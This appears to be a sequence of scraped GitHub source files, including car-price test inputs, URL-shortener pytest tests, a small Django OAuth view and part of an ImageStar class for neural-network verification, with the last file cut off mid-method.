'Bakı'), ('Brand', 'Mercedes'),\n ('Model', 'E 280'), ('ProdYear', '2008'),\n ('BanType', 'Sedan'),\n ('Color', 'Qara'), ('EngVol', '3.0'),\n ('EngPow', '231'), ('FuelType', 'Benzin'),\n ('RideDist', '275000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Arxa'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('SeatVentilation', '1'), ('KsenonLamps', '1'),\n ('YanPerdeler', '1'), ('BackVisionCam', '1'), ('ABS', '1')]\n# $14.300\n\ninput_list4 = [('City', 'Bakı'), ('Brand', 'Chevrolet'),\n ('Model', 'Cruze'), ('ProdYear', '2014'),\n ('BanType', 'Sedan'),\n ('Color', 'Yaş Asfalt'), ('EngVol', '1.4'),\n ('EngPow', '141'), ('FuelType', 'Benzin'),\n ('RideDist', '118000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Ön'),\n ('Barter', '1'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('ABS', '1'), ('ParKRadar', '1'),\n ('RainSensor', '1'), ('MerkeziQapanma', '1'),\n ('SeatVentilation', '1'), ('LeatherSalon', 1)] # 15.500\n\ninput_list5 = [('City', 
'Sumqayıt'), ('Brand', 'Mercedes'),\n ('Model', 'E 320'), ('ProdYear', '2000'),\n ('BanType', 'Sedan'),\n ('Color', 'Bənövşəyi'), ('EngVol', '3.2'),\n ('EngPow', '224'), ('FuelType', 'Benzin'),\n ('RideDist', '248000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Arxa'), ('Barter', '1'),\n ('Credit', '1'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('KsenonLamps', '1'),\n ('YanPerdeler', '1'), ('BackVisionCam', '1'), ('ABS', '1'),\n ('SeatVentilation', '1')] #16.900\n\ninput_list6 = [('City', 'Bakı'), ('Brand', 'Toyota'),\n ('Model', 'Land Cruiser'), ('ProdYear', '2010'),\n ('BanType', 'Offroader / SUV'),\n ('Color', 'Qara'), ('EngVol', '4.7'),\n ('EngPow', '288'), ('FuelType', 'Benzin'),\n ('RideDist', '214000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Tam'), \n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('KsenonLamps', '1'),\n ('YanPerdeler', '1'), ('BackVisionCam', '1'), ('ABS', '1'),\n ('SeatVentilation', '1')] #$36.500\n\ninput_list7 = [('City', 'Bakı'), ('Brand', 'BMW'),\n ('Model', '320'), ('ProdYear', '1998'),\n ('BanType', 'Sedan'),\n ('Color', 'Göy'), ('EngVol', '2.0'),\n ('EngPow', '150'), ('FuelType', 'Benzin'),\n ('RideDist', '266626'), ('Gearbox', 'Mexaniki'),\n ('Transmission', 'Arxa'), \n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('KsenonLamps', '1'),\n ('ABS', '1'),\n ('SeatVentilation', '1')]\n\ninput_list8 = [('City', 'Bakı'), ('Brand', 'Mercedes-Maybach'),\n ('Model', 'S 500'), ('ProdYear', '2015'),\n ('BanType', 'Sedan'),\n ('Color', 'Qara'), ('EngVol', '4.7'),\n ('EngPow', '455'), ('FuelType', 'Benzin'),\n ('RideDist', '78000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Arxa'), \n ('Barter', '1'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('KsenonLamps', '1'),\n ('ABS', '1'),\n ('SeatVentilation', '1')]\n\n\ninput_list8 = [('City', 'Bakı'), ('Brand', 'Mercedes-Maybach'),\n ('Model', 'S 500'), ('ProdYear', '2015'),\n ('BanType', 'Sedan'),\n ('Color', 'Qara'), ('EngVol', '4.7'),\n ('EngPow', '455'), ('FuelType', 'Benzin'),\n ('RideDist', '78000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Arxa'), \n ('Barter', '1'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('KsenonLamps', '1'),\n ('ABS', '1'),\n ('SeatVentilation', '1')]\n\ninput_list9 = [('City', 'Bakı'), ('Brand', 'Toyota'),\n ('Model', 'Corolla'), ('ProdYear', '2021'),\n ('BanType', 'Sedan'),\n ('Color', 'Ağ'), ('EngVol', '1.6'),\n ('EngPow', '124'), ('FuelType', 'Benzin'),\n ('RideDist', '12000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Ön'), \n ('Barter', '1'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('KsenonLamps', '1'),\n ('ABS', '1'),\n 
]\n\n\n\n\n\n\n","repo_name":"DevTeymur/Car-price-prediction-turbo.az","sub_path":"Machine_Learning/test_cases.py","file_name":"test_cases.py","file_ext":"py","file_size_in_byte":7132,"program_lang":"python","lang":"nl","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6086349657","text":"from pathlib import Path\nimport pytest\n\nfrom src.database import Database\n\n\nclass TestDatabase:\n def test_initialize(self, tmp_path: Path):\n db_path = tmp_path / \"test.db\"\n\n Database.initialize(str(db_path))\n\n assert Database.db.get_tables() == [\"link\"]\n\n Database.terminate()\n\n @pytest.mark.usefixtures(\"pre_init_db\")\n def test_set_and_fetch(self):\n original_url = \"https://github.com/BURG3R5/\"\n\n short_back_half = Database.create_short_link(original_url)\n received_url = Database.get_original_url(short_back_half)\n\n assert received_url == original_url\n\n @pytest.mark.usefixtures(\"pre_init_db\")\n def test_fetch_fails_None(self):\n received_url = Database.get_original_url(\"this-link-doesnt-exist-1312\")\n\n assert received_url is None\n\n # @pytest.mark.usefixtures(\"pre_init_db\")\n def test_delete_link(self, my_short_link):\n Database.remove_link(my_short_link)\n\n assert Database.get_original_url(my_short_link) is None\n\n @pytest.mark.usefixtures(\"pre_init_db\")\n def test_delete_fails_silently(self):\n Database.remove_link(\"this-link-doesnt-exist-1312\")\n\n\n# region FIXTURES\n\n\n@pytest.fixture\ndef pre_init_db():\n Database.initialize(\":memory:\")\n\n yield\n\n Database.terminate()\n\n\n@pytest.fixture\ndef my_short_link(pre_init_db):\n back_half = Database.create_short_link(\"https://github.com/BURG3R5/\")\n\n yield back_half\n\n Database.remove_link(back_half)\n\n\n# endregion\n","repo_name":"BURG3R5/url-shortener","sub_path":"tests/database/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15766209683","text":"def unique(list):\n spList = list.split(\",\")\n uniqueList = []\n for i in spList:\n if i not in uniqueList:\n uniqueList.append(i)\n for i in range(uniqueList.count(\"\")):\n uniqueList.remove(\"\")\n result = \"\"\n for i in uniqueList:\n result = result + i + \",\"\n return result\n","repo_name":"EvgenijMutin/Merge","sub_path":"uniqueList.py","file_name":"uniqueList.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71040450409","text":"# Create your views here.\nfrom django.http import HttpResponse\nfrom django.shortcuts import render_to_response,redirect\nimport urllib2\nimport urllib\nimport json\nclient_id=\"\"\nclient_secret=\"\"\ndef index(request):\n\treturn render_to_response('index.html')\ndef auth(request):\n\tclient_id=request.POST['client_id']\n\tclient_secret=request.POST['client_secret']\n\treturn redirect('http://join.agiliq.com/oauth/authorize?client_id='+client_id+'&redirect_uri=http://localhost:8000/agiliq')\ndef agiliq(request):\n\t#return HttpResponse(request.GET['code'])\n\tcode = request.GET['code']\n\turl = 'http://join.agiliq.com/oauth/access_token?'\n\tvalues = {'client_id' : client_id,\n\t\t\t 'redirect_uri' : 'http://localhost:8000/agiliq',\n\t\t\t 'client_secret' : client_secret,\n\t\t\t 'code': code,}\n\t#return HttpResponse(client_secret)\n\t#data = urllib.urlencode(values)\n\treq = urllib2.Request(url+urllib.urlencode(values))\n\tresponse = 
urllib2.urlopen(req)\n\tthe_page = response.read()\n\tobj = json.loads(the_page)\n\ttoken=obj['access_token']\n\treturn render_to_response('inp.html', {\n        'access_token': token,\n        },)","repo_name":"sreeramnitin/Oauth","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23046734987","text":"#!/usr/bin/python3\nimport numpy as np\nimport gurobipy as gp\nfrom gurobipy import GRB \n\nimport sys\nimport operator\n \nsys.path.insert(0, \"../../../engine/set/star/\")\n \nfrom star import *\n\n############################ ERROR MESSAGES ############################\n\n#INVALID_PARAM_NUMBER_MSG = \"ImageStar does not support this number of parameters\"\n\nERRMSG_INCONSISTENT_CONSTR_DIM = \"Inconsistent dimension between constraint matrix and constraint vector\"\nERRMSG_INCONSISTENT_PRED_BOUND_DIM = \"Number of predicates is different from the size of the lower bound or upper bound predicate vector\"\nERRMSG_INCONSISTENT_BOUND_DIM = \"Invalid lower/upper bound predicate vector, vector should have one column\"\nERRMSG_INVALID_CONSTR_VEC = \"Invalid constraint vector, vector should have one column\"\nERRMSG_INVALID_BASE_MATRIX = \"Invalid basis matrix\"\nERRMSG_INCONSISTENT_BASIS_MATRIX_PRED_NUM = \"Inconsistency between the basis matrix and the number of predicate variables\"\n\nERRMSG_INCONSISTENT_LB_DIM = \"Inconsistent dimension between lower bound image and the constructed imagestar\"\nERRMSG_INCONSISTENT_UB_DIM = \"Inconsistent dimension between upper bound image and the constructed imagestar\"\n\nERRMSG_INCONSISTENT_CENTER_IMG_ATTACK_MATRIX = \"Inconsistency between center image and attack bound matrices\"\nERRMSG_INCONSISTENT_CHANNELS_NUM = \"Inconsistent number of channels between the center image and the bound matrices\"\n\nERRMSG_INCONSISTENT_LB_UB_DIM = \"Inconsistency between lower bound image and upper bound image\"\n\nERRMSG_INVALID_INIT = \"Invalid number of input arguments (should be 0, 2, 3, 5, or 7)\"\n\nERRMSG_IMGSTAR_EMPTY = \"The ImageStar is empty\"\n\nERRMSG_INVALID_PREDICATE_VEC = \"Invalid predicate vector\"\n\nERRMSG_INCONSISTENT_PREDVEC_PREDNUM = \"Inconsistency between the size of the predicate vector and the number of predicates in the imagestar\"\n\nERRMSG_INCONSISTENT_SCALE_CHANNELS_NUM = \"Inconsistent number of channels between scale array and the ImageStar\"\n\nERRMSG_INCONSISTENT_IMGDIM_IMGSTAR = \"Inconsistent dimension between input image and the ImageStar\"\n\nERRMSG_INVALID_INPUT_IMG = \"Invalid input image\"\n\nERRMSG_INVALID_INPUT_POINT = \"Invalid input point\"\nERRMSG_INVALID_FIRST_INPUT_POINT = \"The first input point is invalid\"\nERRMSG_INVALID_SECOND_INPUT_POINT = \"The second input point is invalid\"\n\nERRMSG_INVALID_VERT_ID = \"Invalid vertical index\"\nERRMSG_INVALID_HORIZ_ID = \"Invalid horizontal index\"\nERRMSG_INVALID_CHANNEL_ID = \"Invalid channel index\"\n\n\n\nESTIMATE_RANGE_STAGE_STARTED = \"Ranges estimation started...\"\nESTIMATE_RANGE_STAGE_OVER = \"Ranges estimation finished...\"\n\nDISPLAY_ON_OPTION = \"disp\"\n############################ PARAMETERS IDS ############################\n\n##### ATTRIBUTES:\nV_ID = 0\nC_ID = 1\nD_ID = 2\nPREDLB_ID = 3\nPREDUB_ID = 4\nIM_LB_ID = 5\nIM_UB_ID = 6\nIM_ID = 7\nLB_ID = 8\nUB_ID = 9\n\nNUMPRED_ID = 10\nHEIGHT_ID = 11\nWIDTH_ID = 12\nNUM_CHANNEL_ID = 13\nFLATTEN_ORDER_ID = 14\n\nLAST_ATTRIBUTE_ID = FLATTEN_ORDER_ID\n\n##### ARGUMENTS:\nVERT_ID = 
0\nHORIZ_ID = 1\nCHANNEL_ID = 2\n\nPOINTS_ID = 0\n\nSTART_POINT_ID = 0\nPOOL_SIZE_ID = 1\n\nP1_ID = 0\nP2_ID = 1\n#####################\n\n############################ PARAMETERS NUMBERS ############################\nIMAGESTAR_ATTRIBUTES_NUM = LAST_ATTRIBUTE_ID + 1\nPREDICATE_IMGBOUNDS_INIT_ARGS_NUM = 7\nPREDICATE_INIT_ARGS_NUM = 5\nIMAGE_INIT_ARGS_NUM = 3\nBOUNDS_INIT_ARGS_NUM = 2\n#####################\n\nIM_OFFSET = 7\nIMAGE_INIT_ARGS_OFFSET = IM_ID\nBOUNDS_INIT_ARGS_OFFSET = IM_LB_ID\n\nDEFAULT_DISP_OPTION = \"\"\n\nCOLUMN_FLATTEN = 'F'\n############################## DEFAULT VALUES ##############################\n\nDEFAULT_SOLVER_ARGS_NUM = 3\nCUSTOM_SOLVER_ARGS_NUM = 4\n\n\nclass ImageStar:\n # Class for representing set of images using Star set\n # An image can be attacked by bounded noise. An attacked image can\n # be represented using an ImageStar Set\n # author: Mykhailo Ivashchenko\n # date: 2/14/2022\n\n #=================================================================%\n # a 3-channels color image is represented by 3-dimensional array \n # Each dimension contains a h x w matrix, h and w is the height\n # width of the image. h * w = number of pixels in the image.\n # *** A gray image has only one channel.\n #\n # Problem: How to represent a disturbed(attacked) image?\n # \n # Use a center image (a matrix) + a disturbance matrix (positions\n # of attacks and bounds of corresponding noises)\n #\n # For example: Consider a 4 x 4 (16 pixels) gray image \n # The image is represented by 4 x 4 matrix:\n # IM = [1 1 0 1; 0 1 0 0; 1 0 1 0; 0 1 1 1]\n # This image is attacked at pixel (1,1) (1,2) and (2,4) by bounded\n # noises: |n1| <= 0.1, |n2| <= 0.2, |n3| <= 0.05\n #\n #\n # Lower and upper noises bounds matrices are: \n # LB = [-0.1 -0.2 0 0; 0 0 0 -0.05; 0 0 0 0; 0 0 0 0]\n # UB = [0.1 0.2 0 0; 0 0 0 0.05; 0 0 0 0; 0 0 0 0]\n # The lower and upper bounds matrices also describe the position of \n # attack.\n #\n # Under attack we have: -0.1 + 1 <= IM(1,1) <= 1 + 0.1\n # -0.2 + 1 <= IM(1,2) <= 1 + 0.2\n # -0.05 <= IM(2,4) <= 0.05\n #\n # To represent the attacked image we use IM, LB, UB matrices\n # For multi-channel image we use multi-dimensional array IM, LB, UB\n # to represent the attacked image. \n # For example, for an attacked color image with 3 channels we have\n # IM(:, :, 1) = IM1, IM(:,:,2) = IM2, IM(:,:,3) = IM3\n # LB(:, :, 1) = LB1, LB(:,:,2) = LB2, LB(:,:,3) = LB3\n # UB(:, :, 1) = UB1, UB(:,:,2) = UB2, UB(:,:,3) = UB3\n # \n # The image object is: image = ImageStar(IM, LB, UB)\n #=================================================================\n\n # 2D representation of an ImageStar\n # ====================================================================\n # Definition of Star2D\n # \n # A 2D star set S is defined by: \n # S = {x| x = V[0] + a[1]*V[1] + a[2]*V[2] + ... + a[n]*V[n]\n # = V * b, V = {c V[1] V[2] ... V[n]}, \n # b = [1 a[1] a[2] ... a[n]]^T \n # where C*a <= d, constraints on a[i]}\n # where, V[0], V[i] are 2D matrices with the same dimension, i.e., \n # V[i] \\in R^{m x n}\n # V[0] : is called the center matrix and V[i] is called the basic matrix \n # [a[1]...a[n] are called predicate variables\n # C: is the predicate constraint matrix\n # d: is the predicate constraint vector\n # \n # The notion of Star2D is more general than the original Star set where\n # the V[0] and V[i] are vectors. 
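\n    # For example (editor's illustration, not in the original): take V[0] the 2x2\n    # zero matrix, V[1] a 2x2 matrix with a single 1 at entry (1,1), C = [[1], [-1]]\n    # and d = [1, 1]; then C*a <= d forces a in [-1, 1], so this Star2D is the set\n    # of 2x2 images whose (1,1) entry lies in [-1, 1] and whose other entries are 0.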
\n # \n # Dimension of Star2D is the dimension of the center matrix V[0]\n # \n # ====================================================================\n\n\n def __init__(self, *args):\n \"\"\"\n Constructor using 2D representation / 1D representation of an ImageStar\n \n args : np.array([params]) -> a list of initial arguments\n \n params can inlude =>\n \n ================ First initialization option ================\n V : np.array([]) -> a cell (size = numPred)\n C : np.array([]) -> a constraints matrix of the predicate\n d : np.array([]) -> a constraints vector of the predicate\n pred_lb : np.array([]) -> lower bound vector of the predicate\n pred_ub : np.array([]) -> upper bound vector of the predicate\n im_lb : np.array([]) -> lower bound image of the ImageStar\n im_ub : np.array([]) -> upper bound image of the ImageStar\n =============================================================\n \n ================ Second initialization option ================\n V : np.array([]) -> a cell (size = numPred)\n C : np.array([]) -> a constraints matrix of the predicate\n d : np.array([]) -> a constraints vector of the predicate\n pred_lb : np.array([]) -> lower bound vector of the predicate\n pred_ub : np.array([]) -> upper bound vector of the predicate\n =============================================================\n \n ================ Third initialization option ================\n IM : np.array([]) -> center image (high-dimensional array)\n LB : np.array([]) -> lower bound of attack (high-dimensional array)\n UB : np.array([]) -> upper bound of attack (high-dimensional array\n =============================================================\n \"\"\"\n \n self.validate_params(args)\n \n self.attributes = [] \n \n for i in range(IMAGESTAR_ATTRIBUTES_NUM):\n self.attributes.append(np.array([]))\n \n self.scalar_attributes_ids = [\n NUMPRED_ID, HEIGHT_ID, WIDTH_ID, NUM_CHANNEL_ID\n ]\n \n self.attributes[FLATTEN_ORDER_ID] = COLUMN_FLATTEN\n \n if len(args) == PREDICATE_IMGBOUNDS_INIT_ARGS_NUM or len(args) == PREDICATE_INIT_ARGS_NUM: \n if np.size(args[V_ID]) and np.size(args[C_ID]) and np.size(args[D_ID]) and np.size(args[PREDLB_ID]) and np.size(args[PREDUB_ID]):\n assert (args[C_ID].shape[0] == 1 and np.size(args[D_ID]) == 1) or (args[C_ID].shape[0] == args[D_ID].shape[0]), \\\n 'error: %s' % ERRMSG_INCONSISTENT_CONSTR_DIM\n \n assert (np.size(args[D_ID]) == 1) or (len(np.shape(args[D_ID])) == 1), 'error: %s' % ERRMSG_INVALID_CONSTR_VEC\n \n self.attributes[NUMPRED_ID] = args[C_ID].shape[1];\n self.attributes[C_ID] = args[C_ID].astype('float64')\n self.attributes[D_ID] = args[D_ID].astype('float64')\n \n assert args[C_ID].shape[1] == args[PREDLB_ID].shape[0] == args[PREDUB_ID].shape[0], 'error: %s' % ERRMSG_INCONSISTENT_PRED_BOUND_DIM\n \n assert len(args[PREDLB_ID].shape) == len(args[PREDUB_ID].shape) == 1 or args[PREDUB_ID].shape[1], 'error: %s' % ERRMSG_INCONSISTENT_BOUND_DIM\n \n self.attributes[PREDLB_ID] = args[PREDLB_ID].astype('float64')\n self.attributes[PREDUB_ID] = args[PREDUB_ID].astype('float64')\n \n n = args[V_ID].shape\n \n if len(n) < 2:\n raise Exception('error: %s' % ERRMSG_INVALID_BASE_MATRIX)\n else:\n self.attributes[HEIGHT_ID] = n[0]\n self.attributes[WIDTH_ID] = n[1]\n \n self.attributes[V_ID] = args[V_ID]\n \n if len(n) == 4:\n assert n[3] == self.attributes[NUMPRED_ID] + 1, 'error: %s' % ERRMSG_INCONSISTENT_BASIS_MATRIX_PRED_NUM\n \n self.attributes[NUM_CHANNEL_ID] = n[2]\n else:\n # TODO: ASK WHY THIS HAPPENS AFTER THE ASSIGNMENT IN LINE 205\n #self.attributes[NUMPRED_ID] = 
0\n                    \n                    if len(n) == 3:\n                        self.attributes[NUM_CHANNEL_ID] = n[2]\n                    elif len(n) == 2:\n                        self.attributes[NUM_CHANNEL_ID] = 1\n            \n            if len(args) == PREDICATE_IMGBOUNDS_INIT_ARGS_NUM: \n                if args[IM_LB_ID].shape[0] != 0 and (args[IM_LB_ID].shape[0] != self.attributes[HEIGHT_ID] or args[IM_LB_ID].shape[1] != self.attributes[WIDTH_ID]):\n                    raise Exception('error: %s' % ERRMSG_INCONSISTENT_LB_DIM)\n                else:\n                    self.attributes[IM_LB_ID] = args[IM_LB_ID].astype('float64') \n                \n                if args[IM_UB_ID].shape[0] != 0 and (args[IM_UB_ID].shape[0] != self.attributes[HEIGHT_ID] or args[IM_UB_ID].shape[1] != self.attributes[WIDTH_ID]):\n                    raise Exception('error: %s' % ERRMSG_INCONSISTENT_UB_DIM)\n                else:\n                    self.attributes[IM_UB_ID] = args[IM_UB_ID].astype('float64')\n            \n        elif len(args) == IMAGE_INIT_ARGS_NUM:\n            args = self.offset_args(args, IMAGE_INIT_ARGS_OFFSET)\n            if np.size(args[IM_ID]) and np.size(args[LB_ID]) and np.size(args[UB_ID]) and args[V_ID].shape[0] == 0:\n                n = args[IM_ID].shape\n                l = args[LB_ID].shape\n                u = args[UB_ID].shape\n                \n                assert (n[0] == l[0] == u[0] and n[1] == l[1] == u[1]) and (len(n) == len(l) == len(u)), 'error: %s' % ERRMSG_INCONSISTENT_CENTER_IMG_ATTACK_MATRIX\n                \n                assert len(n) == len(l) == len(u), 'error: %s' % ERRMSG_INCONSISTENT_CHANNELS_NUM\n                \n                self.attributes[IM_ID] = args[IM_ID].astype('float64')\n                self.attributes[LB_ID] = args[LB_ID].astype('float64')\n                self.attributes[UB_ID] = args[UB_ID].astype('float64')\n                \n                self.attributes[HEIGHT_ID] = n[0]\n                self.attributes[WIDTH_ID] = n[1]\n                \n                # a 2-D array is a single-channel (gray) image; a 3-D array carries\n                # its channel count in n[2]\n                if len(n) == 2:\n                    self.attributes[NUM_CHANNEL_ID] = 1\n                elif len(n) == 3:\n                    self.attributes[NUM_CHANNEL_ID] = n[2]\n                else:\n                    raise Exception('error: %s' % ERRMSG_INCONSISTENT_CHANNELS_NUM)\n                \n                self.attributes[IM_LB_ID] = self.attributes[IM_ID] + self.attributes[LB_ID]\n                self.attributes[IM_UB_ID] = self.attributes[IM_ID] + self.attributes[UB_ID]\n                \n                n = self.attributes[IM_LB_ID].shape\n                \n                I = 0\n                \n                if len(n) == 3:\n                    #TODO: Star returns 'can't create Star set' error because StarV Star constructor initialization does not correspond to the implementation in NNV\n                    I = Star(self.attributes[IM_LB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID]), self.attributes[IM_UB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID]))\n                    self.attributes[V_ID] = np.reshape(I.V, (I.nVar + 1, n[0] * n[1] * n[2]))\n                else:\n                    I = Star(self.attributes[IM_LB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID]), self.attributes[IM_UB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID]))\n                    self.attributes[V_ID] = np.reshape(I.V, (I.nVar + 1, n[0] * n[1]))\n                \n                self.attributes[C_ID] = I.C\n                self.attributes[D_ID] = I.d\n                \n                # TODO: ask why does Star have predicate_lb and ImageStar pred_lb?\n                self.attributes[PREDLB_ID] = I.predicate_lb\n                self.attributes[PREDUB_ID] = I.predicate_ub\n                \n                self.attributes[NUMPRED_ID] = I.nVar\n        elif len(args) == BOUNDS_INIT_ARGS_NUM:\n            args = self.offset_args(args, BOUNDS_INIT_ARGS_OFFSET)\n            if np.size(args[IM_LB_ID]) and np.size(args[IM_UB_ID]) and args[V_ID].shape[0] == 0: #and np.shape(args[IM_ID])[0] == 0:\n                lb_shape = args[IM_LB_ID].shape\n                ub_shape = args[IM_UB_ID].shape\n                \n                assert len(lb_shape) == len(ub_shape), 'error: %s' % ERRMSG_INCONSISTENT_LB_UB_DIM\n                \n                for i in range(len(lb_shape)):\n                    assert lb_shape[i] == ub_shape[i], 'error: %s' % ERRMSG_INCONSISTENT_LB_UB_DIM\n                \n                lb = args[IM_LB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID])\n                ub = args[IM_UB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID])\n                \n                #TODO: Star returns 'can't create Star set' error because StarV Star 
constructor initialization does not correspond to the implementation in NNV \n                S = Star(lb, ub)\n                \n                self.copy_deep(S.toImageStar)\n                \n                # the lower/upper bound images come straight from the (already validated) arguments\n                self.attributes[IM_LB_ID] = args[IM_LB_ID].astype('float64')\n                self.attributes[IM_UB_ID] = args[IM_UB_ID].astype('float64')\n            elif self.isempty_init(args):\n                self.init_empty_imagestar()\n            else:\n                raise Exception('error: %s' % ERRMSG_INVALID_INIT)\n        \n    def sample(self, N):\n        \"\"\"\n        Randomly generates a set of images from an imagestar set\n        \n        N : int -> number of images\n        return -> set of images\n        \"\"\"\n        \n        assert (not self.isempty(self.attributes[V_ID])), 'error: %s' % ERRMSG_IMGSTAR_EMPTY\n        \n        if self.isempty(self.attributes[C_ID]) or self.isempty(self.attributes[D_ID]):\n            return self.attributes[IM_ID]\n        else:\n            new_V = np.hstack((np.zeros((self.attributes[NUMPRED_ID], 1)), np.eye(self.attributes[NUMPRED_ID])))\n            #TODO: Star returns an error when checking the dimensions even though they match\n            S = Star(new_V, self.attributes[C_ID], self.attributes[D_ID])\n            pred_samples = S.sample(N)\n            \n            images = []\n            \n            for i in range(len(pred_samples)):\n                images.append(np.array(self.evaluate(pred_samples[:, i])))\n            \n            return images\n        \n    def evaluate(self, pred_val):\n        \"\"\"\n        Evaluate an ImageStar with specific values of predicates\n        \n        pred_val : *int -> a vector of predicate variables\n        return -> evaluated image\n        \"\"\" \n        \n        assert (not self.isempty(self.attributes[V_ID])), 'error: %s' % ERRMSG_IMGSTAR_EMPTY\n        \n        assert len(pred_val.shape) == 1, 'error: %s' % ERRMSG_INVALID_PREDICATE_VEC\n        \n        assert pred_val.shape[0] == self.attributes[NUMPRED_ID], 'error: %s' % ERRMSG_INCONSISTENT_PREDVEC_PREDNUM\n        \n        image = np.zeros((self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID], self.attributes[NUM_CHANNEL_ID]))\n        \n        for i in range(self.attributes[NUM_CHANNEL_ID]):\n            # V[..., 0] holds the center image; V[..., 1:] hold the basis images\n            image[:, :, i] = self.attributes[V_ID][:, :, i, 0]\n            \n            for j in range(1, self.attributes[NUMPRED_ID] + 1):\n                image[:, :, i] = image[:, :, i] + pred_val[j - 1] * self.attributes[V_ID][:, :, i, j]\n        \n        return image\n        \n    def affine_map(self, scale, offset):\n        \"\"\"\n        Performs affine mapping of the ImageStar: y = scale * x + offset\n        \n        scale : *float -> scale coefficient [1 x 1 x num_channel] array\n        offset : *float -> offset coefficient [1 x 1 x num_channel] array\n        return -> a new ImageStar\n        \"\"\"\n        \n        assert (self.isempty(scale) or self.is_scalar(scale) or len(scale.shape) == self.attributes[NUM_CHANNEL_ID]), 'error: %s' % ERRMSG_INCONSISTENT_SCALE_CHANNELS_NUM\n        \n        new_V = 0\n        \n        if not self.isempty(scale):\n            new_V = np.multiply(scale, self.attributes[V_ID])\n        else:\n            new_V = self.attributes[V_ID]\n        \n        # Affine Mapping changes the center\n        if not self.isempty(offset):\n            new_V[:, :, :, 0] = new_V[:, :, :, 0] + offset\n        \n        return ImageStar(new_V, self.attributes[C_ID], self.attributes[D_ID], self.attributes[PREDLB_ID], self.attributes[PREDUB_ID])\n
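\n    # Editor's sketch (hypothetical usage, not from the original): scale and offset\n    # are per-channel arrays, e.g. for a 3-channel set one might write\n    #   I2 = I.affine_map(0.5 * np.ones((1, 1, 3)), 0.1 * np.ones((1, 1, 3)))\n    # which scales the whole set by 0.5 and then shifts the center image by 0.1.\n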
\n    def to_star(self):\n        \"\"\"\n        Converts current ImageStar to Star\n        \n        return -> created Star\n        \"\"\"\n        \n        pixel_num = self.attributes[HEIGHT_ID] * self.attributes[WIDTH_ID] * self.attributes[NUM_CHANNEL_ID]\n        \n        new_V = np.zeros((pixel_num, self.attributes[NUMPRED_ID] + 1))\n        \n        if self.isempty(new_V):\n            # TODO: error: failed to create Star set\n            return Star()\n        else:\n            for j in range(self.attributes[NUMPRED_ID] + 1):\n                #new_V[:, j] = np.reshape(self.attributes[V_ID][:, :, :, j], (pixel_num, 0))\n                new_V[:, j] = self.attributes[V_ID][:, :, :, j].flatten(order=self.attributes[FLATTEN_ORDER_ID])\n            \n            if not self.isempty(self.attributes[IM_LB_ID]) and not self.isempty(self.attributes[IM_UB_ID]):\n                state_lb = self.attributes[IM_LB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID])\n                state_ub = self.attributes[IM_UB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID])\n                \n                # TODO: error: failed to create Star set\n                S = Star(new_V, self.attributes[C_ID], self.attributes[D_ID], self.attributes[PREDLB_ID], self.attributes[PREDUB_ID], state_lb, state_ub)\n            else:\n                # TODO: error: failed to create Star set\n                S = Star(new_V, self.attributes[C_ID], self.attributes[D_ID], self.attributes[PREDLB_ID], self.attributes[PREDUB_ID])\n            \n            return S\n        \n    def is_empty_set(self):\n        \"\"\"\n        Checks if the ImageStar is empty\n        \n        return -> True if empty, False if isn't empty\n        \"\"\"\n        \n        S = self.to_star()\n        return S.isEmptySet()\n        \n    def contains(self, image):\n        \"\"\"\n        Checks if the ImageStar contains the image\n        \n        image : *float -> input image\n        return -> = 1 if the ImageStar contain the image\n                  = 0 if the ImageStar does not contain the image\n        \"\"\"\n        \n        img_size = image.shape\n        \n        if len(img_size) == 2: # one channel image\n            assert (img_size[0] == 